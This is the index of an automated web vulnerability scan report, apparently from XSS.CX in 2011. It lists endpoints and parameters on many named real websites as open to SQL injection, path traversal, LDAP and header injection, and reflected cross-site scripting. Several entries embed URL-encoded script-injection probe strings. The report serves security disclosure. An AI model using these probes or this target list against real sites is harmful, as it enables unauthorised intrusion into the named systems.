Path Traversal, SQL Injection, HTTP Header Injection, Reflected XSS, DORK, GHDB, Report

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Apr 21 14:40:01 CDT 2011.


Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. SQL injection

1.1. http://ad.amgdgt.com/ads/ [name of an arbitrarily supplied request parameter]

1.2. http://ad.doubleclick.net/adi/martindale.ll.stateresults.dart/ [User-Agent HTTP header]

1.3. http://googleads.g.doubleclick.net/pagead/ads [id cookie]

1.4. http://googleads.g.doubleclick.net/pagead/ads [lmt parameter]

1.5. http://googleads.g.doubleclick.net/pagead/ads [output parameter]

1.6. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter]

1.7. http://googleads.g.doubleclick.net/pagead/ads [u_h parameter]

1.8. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

1.9. http://googleads.g.doubleclick.net/pagead/ads [w parameter]

1.10. http://visitordrive.com/evTracker/evtracker.php [_evacct parameter]

1.11. http://visitordrive.com/evTracker/services/keywords.php [edate parameter]

1.12. http://visitordrive.com/evTracker/services/keywords.php [sdate parameter]

1.13. http://www.curtis.com/emaildisclaimer.cfm [CFID cookie]

1.14. http://www.curtis.com/emaildisclaimer.cfm [CFTOKEN cookie]

1.15. http://www.curtis.com/emaildisclaimer.cfm [REST URL parameter 1]

1.16. http://www.curtis.com/emaildisclaimer.cfm [__utma cookie]

1.17. http://www.curtis.com/emaildisclaimer.cfm [__utmb cookie]

1.18. http://www.curtis.com/emaildisclaimer.cfm [__utmc cookie]

1.19. http://www.curtis.com/emaildisclaimer.cfm [__utmz cookie]

1.20. http://www.curtis.com/emaildisclaimer.cfm [sifrFetch cookie]

1.21. http://www.curtis.com/favicon.ico [CFID cookie]

1.22. http://www.curtis.com/favicon.ico [CFTOKEN cookie]

1.23. http://www.curtis.com/favicon.ico [REST URL parameter 1]

1.24. http://www.curtis.com/favicon.ico [__utma cookie]

1.25. http://www.curtis.com/favicon.ico [__utmb cookie]

1.26. http://www.curtis.com/favicon.ico [__utmc cookie]

1.27. http://www.curtis.com/favicon.ico [__utmz cookie]

1.28. http://www.curtis.com/favicon.ico [sifrFetch cookie]

1.29. http://www.curtis.com/flash/curtis.swf [REST URL parameter 1]

1.30. http://www.curtis.com/flash/curtis.swf [REST URL parameter 2]

1.31. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 1]

1.32. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 2]

1.33. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 3]

1.34. http://www.curtis.com/scripts/carousel/getimages.cfm [CFID cookie]

1.35. http://www.curtis.com/scripts/carousel/getimages.cfm [CFTOKEN cookie]

1.36. http://www.curtis.com/scripts/carousel/getimages.cfm [REST URL parameter 3]

1.37. http://www.curtis.com/scripts/carousel/getimages.cfm [doctype parameter]

1.38. http://www.curtis.com/scripts/carousel/getimages.cfm [first_last_buttons parameter]

1.39. http://www.curtis.com/scripts/carousel/getimages.cfm [first_slide_is_intro parameter]

1.40. http://www.curtis.com/scripts/carousel/getimages.cfm [hover_next_prev_buttons parameter]

1.41. http://www.curtis.com/scripts/carousel/getimages.cfm [name of an arbitrarily supplied request parameter]

1.42. http://www.curtis.com/scripts/carousel/getimages.cfm [next_prev_buttons parameter]

1.43. http://www.curtis.com/scripts/carousel/getimages.cfm [pause_button parameter]

1.44. http://www.curtis.com/scripts/carousel/getimages.cfm [sifrFetch cookie]

1.45. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_buttons parameter]

1.46. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_captions parameter]

1.47. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_directory parameter]

1.48. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_links parameter]

1.49. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_number_display parameter]

1.50. http://www.curtis.com/scripts/carousel/getimages.cfm [water_mark parameter]

1.51. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 1]

1.52. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 2]

1.53. http://www.curtis.com/sifr3/garamond.swf [REST URL parameter 1]

1.54. http://www.curtis.com/sifr3/garamond.swf [REST URL parameter 2]

1.55. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 1]

1.56. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 2]

1.57. http://www.curtis.com/sitecontent.cfm [CFID cookie]

1.58. http://www.curtis.com/sitecontent.cfm [CFTOKEN cookie]

1.59. http://www.curtis.com/sitecontent.cfm [REST URL parameter 1]

1.60. http://www.curtis.com/sitecontent.cfm [__utma cookie]

1.61. http://www.curtis.com/sitecontent.cfm [__utmb cookie]

1.62. http://www.curtis.com/sitecontent.cfm [__utmc cookie]

1.63. http://www.curtis.com/sitecontent.cfm [__utmz cookie]

1.64. http://www.curtis.com/sitecontent.cfm [sifrFetch cookie]

1.65. http://www.friedfrank.com/ [__utma cookie]

1.66. http://www.friedfrank.com/ [__utmz cookie]

1.67. http://www.friedfrank.com/favicon.ico [REST URL parameter 1]

1.68. http://www.friedfrank.com/flash/perpetua.swf [REST URL parameter 1]

1.69. http://www.friedfrank.com/index.cfm [CFID cookie]

1.70. http://www.friedfrank.com/index.cfm [CFTOKEN cookie]

1.71. http://www.friedfrank.com/index.cfm [JSMOBILE cookie]

1.72. http://www.friedfrank.com/index.cfm [REST URL parameter 1]

1.73. http://www.friedfrank.com/index.cfm [__utma cookie]

1.74. http://www.friedfrank.com/index.cfm [__utmb cookie]

1.75. http://www.friedfrank.com/index.cfm [__utmc cookie]

1.76. http://www.friedfrank.com/index.cfm [__utmz cookie]

1.77. http://www.longislanderotic.com/forum [name of an arbitrarily supplied request parameter]

1.78. http://www.millerwelds.com/about/ [REST URL parameter 1]

1.79. http://www.millerwelds.com/about/ [name of an arbitrarily supplied request parameter]

1.80. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]

1.81. http://www.millerwelds.com/about/certifications.html [REST URL parameter 2]

1.82. http://www.millerwelds.com/about/certifications.html [name of an arbitrarily supplied request parameter]

1.83. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]

1.84. http://www.millerwelds.com/financing/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter]

1.85. http://www.millerwelds.com/financing/ [REST URL parameter 1]

1.86. http://www.millerwelds.com/financing/ [int_campaign parameter]

1.87. http://www.millerwelds.com/financing/ [int_content parameter]

1.88. http://www.millerwelds.com/financing/ [int_medium parameter]

1.89. http://www.millerwelds.com/financing/ [int_source parameter]

1.90. http://www.millerwelds.com/financing/ [name of an arbitrarily supplied request parameter]

1.91. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]

1.92. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]

1.93. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

1.94. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]

1.95. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

1.96. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]

1.97. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

1.98. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]

1.99. http://www.millerwelds.com/landing/drive/ [REST URL parameter 1]

1.100. http://www.millerwelds.com/landing/drive/ [REST URL parameter 2]

1.101. http://www.millerwelds.com/landing/drive/ [name of an arbitrarily supplied request parameter]

1.102. http://www.millerwelds.com/landing/drive/ [utm_campaign parameter]

1.103. http://www.millerwelds.com/landing/drive/ [utm_content parameter]

1.104. http://www.millerwelds.com/landing/drive/ [utm_medium parameter]

1.105. http://www.millerwelds.com/landing/drive/ [utm_source parameter]

1.106. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 6]

1.107. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

1.108. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 9]

1.109. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

1.110. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]

1.111. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 2]

1.112. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]

1.113. http://www.millerwelds.com/products/accessories/ [REST URL parameter 2]

1.114. http://www.millerwelds.com/products/accessories/ [name of an arbitrarily supplied request parameter]

1.115. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]

1.116. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 2]

1.117. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 3]

1.118. http://www.millerwelds.com/products/accessories/international/ [name of an arbitrarily supplied request parameter]

1.119. http://www.millerwelds.com/resources/ [REST URL parameter 1]

1.120. http://www.millerwelds.com/resources/ [name of an arbitrarily supplied request parameter]

1.121. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]

1.122. http://www.millerwelds.com/service/ [REST URL parameter 1]

1.123. http://www.millerwelds.com/service/ [name of an arbitrarily supplied request parameter]

1.124. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]

1.125. http://www.millerwelds.com/wheretobuy/ [name of an arbitrarily supplied request parameter]

1.126. http://www.socialfollow.com/button/ [b parameter]

1.127. http://www.socialfollow.com/button/image/ [b parameter]

2. File path traversal

2.1. http://www.rockyou.com/fxtext/fxtext-create.php [lang cookie]

2.2. http://www.rockyou.com/show_my_gallery.php [lang cookie]

3. LDAP injection

3.1. http://209.234.249.173/External/Application/Advertising/d0daadf2-a2dd-452d-97ab-1e94229fd41a/ [REST URL parameter 3]

3.2. http://209.234.249.173/External/Application/Advertising/d0daadf2-a2dd-452d-97ab-1e94229fd41a/ [REST URL parameter 4]

3.3. http://209.234.249.173/External/Application/BaseURL/ [REST URL parameter 3]

3.4. http://209.234.249.173/External/Application/Beacon/ [REST URL parameter 3]

3.5. http://209.234.249.173/External/Application/Metrics/Actions/ [REST URL parameter 3]

3.6. http://209.234.249.173/External/Application/Session/2F-E1-34-D1-73-5E-0A-2B-AF-56-17-42-E6-B0-67-2A/ [REST URL parameter 3]

3.7. http://209.234.249.173/External/Application/Session/2F-E1-34-D1-73-5E-0A-2B-AF-56-17-42-E6-B0-67-2A/ [REST URL parameter 4]

3.8. http://209.234.249.173/External/Application/Session/3E-90-85-0C-C0-0A-28-B7-CC-60-54-AD-8E-9E-5B-48/ [REST URL parameter 3]

3.9. http://209.234.249.173/External/Application/Session/3E-90-85-0C-C0-0A-28-B7-CC-60-54-AD-8E-9E-5B-48/ [REST URL parameter 4]

3.10. http://209.234.249.173/External/Application/Session/D3-90-3B-AA-80-CE-74-CA-DB-71-B3-A9-83-81-75-0B/ [REST URL parameter 3]

3.11. http://209.234.249.173/External/Application/Session/D3-90-3B-AA-80-CE-74-CA-DB-71-B3-A9-83-81-75-0B/ [REST URL parameter 4]

3.12. http://209.234.249.173/External/Channel/Playlist/2c3b384a-3efd-4b2c-b6ea-5e7c400e2126/ [REST URL parameter 4]

3.13. http://209.234.249.173/External/MediaItem/d0daadf2-a2dd-452d-97ab-1e94229fd41a/AdPositions/ [REST URL parameter 3]

3.14. http://altfarm.mediaplex.com/ad/bn/8742-48471-18339-27 [mpt parameter]

3.15. http://counter.rewardsnetwork.com/cm [ci parameter]

3.16. http://www.martindale.com/all/c-england/all-lawyers-4.htm [op397mdcsearchresultsliid cookie]

3.17. http://www.martindale.com/all/c-england/all-lawyers-5.htm [c parameter]

3.18. http://www.martindale.com/all/c-england/all-lawyers-7.htm [c parameter]

4. HTTP header injection

4.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

4.2. http://ad.doubleclick.net/ad/N3905.291893.COXDIGITALSOLUTIONS/B5343548 [REST URL parameter 1]

4.3. http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper [REST URL parameter 1]

4.4. http://ad.doubleclick.net/adi/martindale.ll.stateresults.dart/ [REST URL parameter 1]

4.5. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Leaderboard_RON [REST URL parameter 1]

4.6. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON [REST URL parameter 1]

4.7. http://ad.doubleclick.net/getcamphist [REST URL parameter 1]

4.8. http://ad.doubleclick.net/getcamphist [src parameter]

4.9. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 1]

4.10. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 2]

4.11. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 3]

4.12. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 1]

4.13. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 2]

4.14. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 3]

4.15. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [S cookie]

4.16. http://nike.112.2o7.net/b/ss/nikeall/1/H.22.1/s25785419596359 [vmf parameter]

5. Cross-site scripting (reflected)

5.1. http://ads.adxpose.com/ads/ads.js [uid parameter]

5.2. http://btilelog.access.mapquest.com/tilelog/transaction [transaction parameter]

5.3. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

5.4. http://digg.com/submit [REST URL parameter 1]

5.5. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [callback parameter]

5.6. http://ds.addthis.com/red/psi/sites/www.curtis.com/p.json [callback parameter]

5.7. http://event.adxpose.com/event.flow [uid parameter]

5.8. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.9. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

5.10. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

5.11. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

5.12. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

5.13. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

5.14. http://jqueryui.com/themeroller/css/parseTheme.css.php [c95d2 parameter]

5.15. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]

5.16. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]

5.17. http://mochibot.com/my/core.swf [f parameter]

5.18. http://mochibot.com/my/core.swf [mv parameter]

5.19. http://mochibot.com/my/core.swf [sb parameter]

5.20. http://mochibot.com/my/core.swf [swfid parameter]

5.21. http://widgets.digg.com/buttons/count [url parameter]

5.22. http://www.arnoldporter.com/industries.cfm [name of an arbitrarily supplied request parameter]

5.23. http://www.arnoldporter.com/industries.cfm [nsextt parameter]

5.24. http://www.arnoldporter.com/industries.cfm [u parameter]

5.25. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

5.26. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]

5.27. http://www.curtis.com/emaildisclaimer.cfm [itemID parameter]

5.28. http://www.curtis.com/emaildisclaimer.cfm [itemType parameter]

5.29. http://www.curtis.com/sitecontent.cfm [name of an arbitrarily supplied request parameter]

5.30. http://www.faegre.co.uk/11572 [REST URL parameter 1]

5.31. http://www.faegre.co.uk/11572 [name of an arbitrarily supplied request parameter]

5.32. http://www.faegre.co.uk/59 [REST URL parameter 1]

5.33. http://www.faegre.co.uk/59 [name of an arbitrarily supplied request parameter]

5.34. http://www.faegre.co.uk/bios [REST URL parameter 1]

5.35. http://www.faegre.co.uk/bios [name of an arbitrarily supplied request parameter]

5.36. http://www.faegre.co.uk/community [REST URL parameter 1]

5.37. http://www.faegre.co.uk/community [name of an arbitrarily supplied request parameter]

5.38. http://www.faegre.co.uk/eventtypes [REST URL parameter 1]

5.39. http://www.faegre.co.uk/eventtypes [name of an arbitrarily supplied request parameter]

5.40. http://www.faegre.co.uk/favicon.ico [REST URL parameter 1]

5.41. http://www.faegre.co.uk/getdoc.aspx [REST URL parameter 1]

5.42. http://www.faegre.co.uk/index.aspx [REST URL parameter 1]

5.43. http://www.faegre.co.uk/jscripts.js [REST URL parameter 1]

5.44. http://www.faegre.co.uk/rankingawards [REST URL parameter 1]

5.45. http://www.faegre.co.uk/rankingawards [name of an arbitrarily supplied request parameter]

5.46. http://www.faegre.co.uk/showlocation.aspx [REST URL parameter 1]

5.47. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]

5.48. http://www.friedfrank.com/ [name of an arbitrarily supplied request parameter]

5.49. http://www.friedfrank.com/index.cfm [more parameter]

5.50. http://www.friedfrank.com/index.cfm [name of an arbitrarily supplied request parameter]

5.51. http://www.humaniplex.com/blogs/ [name of an arbitrarily supplied request parameter]

5.52. http://www.humaniplex.com/classifieds/ [name of an arbitrarily supplied request parameter]

5.53. http://www.humaniplex.com/clubs/list [REST URL parameter 2]

5.54. http://www.humaniplex.com/clubs/list [name of an arbitrarily supplied request parameter]

5.55. http://www.humaniplex.com/flirts/ [name of an arbitrarily supplied request parameter]

5.56. http://www.humaniplex.com/index.html [name of an arbitrarily supplied request parameter]

5.57. http://www.humaniplex.com/mingle [name of an arbitrarily supplied request parameter]

5.58. http://www.humaniplex.com/mingle/ [name of an arbitrarily supplied request parameter]

5.59. http://www.humaniplex.com/profiles/ [name of an arbitrarily supplied request parameter]

5.60. http://www.humaniplex.com/tos/site.html [qs parameter]

5.61. http://www.humaniplex.com/tos/site.html [qs parameter]

5.62. http://www.humaniplex.com/user_tools/forgot_password/ [name of an arbitrarily supplied request parameter]

5.63. http://www.humaniplex.com/user_tools/join/ [name of an arbitrarily supplied request parameter]

5.64. http://www.leaseweb.com/en [REST URL parameter 1]

5.65. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]

5.66. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]

5.67. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 1]

5.68. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 2]

5.69. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 3]

5.70. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 1]

5.71. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 2]

5.72. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 3]

5.73. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 1]

5.74. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 2]

5.75. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 3]

5.76. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 4]

5.77. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 5]

5.78. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [name of an arbitrarily supplied request parameter]

5.79. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 1]

5.80. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 2]

5.81. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 1]

5.82. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 2]

5.83. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]

5.84. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]

5.85. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]

5.86. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 1]

5.87. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 2]

5.88. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 3]

5.89. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 1]

5.90. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 2]

5.91. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 3]

5.92. http://www.leaseweb.com/osdd.xml [REST URL parameter 1]

5.93. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 1]

5.94. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 2]

5.95. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]

5.96. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]

5.97. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 1]

5.98. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 2]

5.99. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 3]

5.100. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]

5.101. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]

5.102. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]

5.103. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

5.104. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

5.105. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

5.106. http://www.martindale.com/Results.aspx [ft parameter]

5.107. http://www.martindale.com/Results.aspx [ft parameter]

5.108. http://www.martindale.com/Results.aspx [hid parameter]

5.109. http://www.martindale.com/Results.aspx [sh parameter]

5.110. http://www.millerwelds.com/about/ [REST URL parameter 1]

5.111. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]

5.112. http://www.millerwelds.com/financing/ [REST URL parameter 1]

5.113. http://www.millerwelds.com/financing/ [int_campaign parameter]

5.114. http://www.millerwelds.com/financing/ [int_content parameter]

5.115. http://www.millerwelds.com/financing/ [int_medium parameter]

5.116. http://www.millerwelds.com/financing/ [int_source parameter]

5.117. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

5.118. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

5.119. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

5.120. http://www.millerwelds.com/landing/drive/ [REST URL parameter 1]

5.121. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]

5.122. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]

5.123. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]

5.124. http://www.millerwelds.com/resources/ [REST URL parameter 1]

5.125. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]

5.126. http://www.millerwelds.com/service/ [REST URL parameter 1]

5.127. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]

5.128. http://www.mypowerblock.com/xn/loader [r parameter]

5.129. http://www.nike.com/nikeos/p/nikegolf/en_US/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E parameter]

5.130. http://www.nike.com/nikeos/p/nikegolf/en_US/ [name of an arbitrarily supplied request parameter]

5.131. http://www.nike.com/nikeos/p/usnikefootball/lang_LO/utilities/compress [includes parameter]

5.132. http://www.nike.com/nsl/services/user/isloggedin [REST URL parameter 4]

5.133. http://www.nike.com/nsl/services/user/isloggedin [callback parameter]

5.134. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]

5.135. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]

5.136. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]

5.137. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]

5.138. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [h parameter]

5.139. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [w parameter]

5.140. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]

5.141. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]

5.142. http://www.rockyou.com/developer/opensocial/opensocial-css.php [name of an arbitrarily supplied request parameter]

5.143. http://www.rockyou.com/developer/opensocial/opensocial-css.php [title parameter]

5.144. http://www.rockyou.com/login/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E parameter]

5.145. http://www.rockyou.com/login/ [name of an arbitrarily supplied request parameter]

5.146. http://www.rockyou.com/login/index.php [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E parameter]

5.147. http://www.rockyou.com/login/index.php [name of an arbitrarily supplied request parameter]

5.148. http://www.rockyou.com/show_my_gallery.php [instanceid parameter]

5.149. http://www.socialfollow.com/button/ [b parameter]

5.150. http://www.socialfollow.com/button/css/ [b parameter]

5.151. http://www.socialfollow.com/button/css/ [socialSites parameter]

5.152. http://www.socialfollow.com/login.php [tEmail parameter]

5.153. http://www.viglink.com/users/login [ar parameter]

5.154. https://www.viglink.com/users/login [ar parameter]

5.155. http://www.ypg.com/en [REST URL parameter 1]

5.156. http://www.ypg.com/en/ [REST URL parameter 1]

5.157. http://www.ypg.com/en/contact-us [REST URL parameter 1]

5.158. http://www.ypg.com/en/contact-us [REST URL parameter 2]

5.159. http://www.ypg.com/en/contact-us [name of an arbitrarily supplied request parameter]

5.160. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 1]

5.161. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 2]

5.162. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 3]

5.163. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

5.164. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

5.165. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

5.166. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

5.167. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [name of an arbitrarily supplied request parameter]

5.168. http://www.ypg.com/en/images/loading.gif [REST URL parameter 1]

5.169. http://www.ypg.com/en/images/loading.gif [REST URL parameter 2]

5.170. http://www.ypg.com/en/images/loading.gif [REST URL parameter 3]

5.171. http://www.ypg.com/en/images/loading.gif [name of an arbitrarily supplied request parameter]

5.172. http://www.ypg.com/images/imageresizer.php [REST URL parameter 1]

5.173. http://www.ypg.com/images/imageresizer.php [REST URL parameter 2]

5.174. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 1]

5.175. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 2]

5.176. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 3]

5.177. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 4]

5.178. http://www.zoomerang.com/Survey/TinyMCE.ashx [font parameter]

5.179. http://mochibot.com/my/core.swf [Referer HTTP header]

5.180. http://www.arnoldporter.com/ [Referer HTTP header]

5.181. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

5.182. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]

5.183. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]

5.184. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

5.185. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]

5.186. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]

5.187. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]

5.188. http://www.arnoldporter.com/search.cfm [Referer HTTP header]

5.189. http://www.friedfrank.com/ [User-Agent HTTP header]

5.190. http://www.friedfrank.com/includes/vcard.cfm [User-Agent HTTP header]

5.191. http://www.friedfrank.com/index.cfm [User-Agent HTTP header]

5.192. http://www.friedfrank.com/printfriendly.cfm [User-Agent HTTP header]

6. Flash cross-domain policy

6.1. http://209.234.249.173/crossdomain.xml

6.2. http://adserver.adtechus.com/crossdomain.xml

6.3. http://beacon.securestudies.com/crossdomain.xml

6.4. http://c.brightcove.com/crossdomain.xml

6.5. http://r.unicornmedia.com/crossdomain.xml

6.6. http://rcv-srv86.inplay.tubemogul.com/crossdomain.xml

6.7. http://receive.inplay.tubemogul.com/crossdomain.xml

6.8. http://adadvisor.net/crossdomain.xml

6.9. http://apps.rockyou.com/crossdomain.xml

6.10. http://www.rockyou.com/crossdomain.xml

6.11. http://mypowerblock.ning.com/crossdomain.xml

6.12. http://www.mypowerblock.com/crossdomain.xml

7. Silverlight cross-domain policy

8. Cleartext submission of password

8.1. http://community.martindale.com/groups/groupdirectory.aspx

8.2. http://community.martindale.com/upgrade-your-connected-account.aspx

